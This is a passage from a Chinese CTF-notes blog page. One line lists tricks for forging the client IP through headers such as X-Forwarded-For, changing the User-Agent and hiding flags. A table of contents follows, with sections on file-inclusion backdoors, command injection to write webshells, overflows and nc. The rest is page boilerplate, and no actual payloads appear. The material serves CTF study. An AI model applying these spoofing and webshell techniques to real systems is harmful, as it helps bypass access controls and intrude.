<p>十五、协议，花式IP伪造X-Forwarded-For/X-Client-IP/X-Real-IP/CDN-Src-IP、花式改UA，花式藏FLAG、花式分析数据包 </p>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">zhiliya</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2019/11/21/%E5%B8%B8/">http://yoursite.com/2019/11/21/常/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="http://yoursite.com">zhiliya的博客</a>！</span></div></blockquote></div></article><div class="p-info box"></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#文件包含漏洞写后门"><span class="toc-number">1.</span> <span class="toc-text">文件包含漏洞写后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#命令执行漏洞"><span class="toc-number">2.</span> <span class="toc-text">命令执行漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#命令注入写webshell"><span class="toc-number">3.</span> <span class="toc-text">命令注入写webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#数据库"><span class="toc-number">4.</span> <span class="toc-text">数据库</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#js"><span class="toc-number">5.</span> <span class="toc-text">js</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#python"><span class="toc-number">6.</span> <span class="toc-text">python</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#溢出"><span class="toc-number">7.</span> <span class="toc-text">溢出</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#nc"><span class="toc-number">8.</span> <span class="toc-text">nc</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#信息搜集"><span class="toc-number">9.</span> <span class="toc-text">信息搜集</span></a></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="prev" href="/2019/11/21/%E9%9A%90%E5%86%99/">&lt; 隐写</a><a class="next" href="/2019/11/20/rsa-sage-Coppersmith-%E5%AE%9A%E7%90%86%E6%94%BB%E5%87%BB/">rsa sage  Coppersmith 定理攻击 &gt;</a></div><div id="valine-comment"><style type="text/css">.night .v[data-class=v] a { color: #0F9FB4 !important; }
.night .v[data-class=v] a:hover { color: #216C73 !important; }
.night .v[data-class=v] li { list-style: inherit; }
.night .v[data-class=v] .vwrap { border: 1px solid #223441; border-radius: 0; }
.night .v[data-class=v] .vwrap:hover { box-shadow: 0 0 6px 1px #223441; }
.night .v[data-class=v] .vbtn { border-radius: 0; background: none; }
.night .v[data-class=v] .vlist .vcard .vh { border-bottom-color: #293D4E; }
.night .v[data-class=v] .vwrap .vheader .vinput { border-bottom-color: #223441; }
.night .v[data-class=v] .vwrap .vheader .vinput:focus { border-bottom-color: #339EB4; }
.night .v[data-class=v] code, .night .v[data-class=v] pre,.night .v[data-class=v] .vlist .vcard .vhead .vsys { background: #203240 !important; }
.night .v[data-class=v] code, .night .v[data-class=v] pre { color: #F0F0F0; font-size: 95%; }
.v[data-class=v] .vcards .vcard .vh {border-bottom-color: #223441; }
.night .v[data-class=v] .vcards .vcard .vcontent.expand:before {background: linear-gradient(180deg,rgba(38,57,73,.4),rgba(38,57,73,.9));}
.night .v[data-class=v] .vcards .vcard .vcontent.expand:after {background: rgba(38,57,73,.9)}
</style><div id="vcomment"></div><script src="//cdn.bootcdn.net/ajax/libs/valine/1.4.14/Valine.min.js"></script><script>var notify = 'false' == true ? true : false;
var verify = 'false' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'',
  appKey:'',
  lang: 'zh-cn',
  placeholder:'ヾﾉ≧∀≦)o Come on, say something...',
  avatar:'identicon',
  guest_info:guest_info,
  pageSize:'10'
})</script></div></section><footer><p>Copyright © 2016 - 2023 <a href="/." rel="nofollow">zhiliya</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>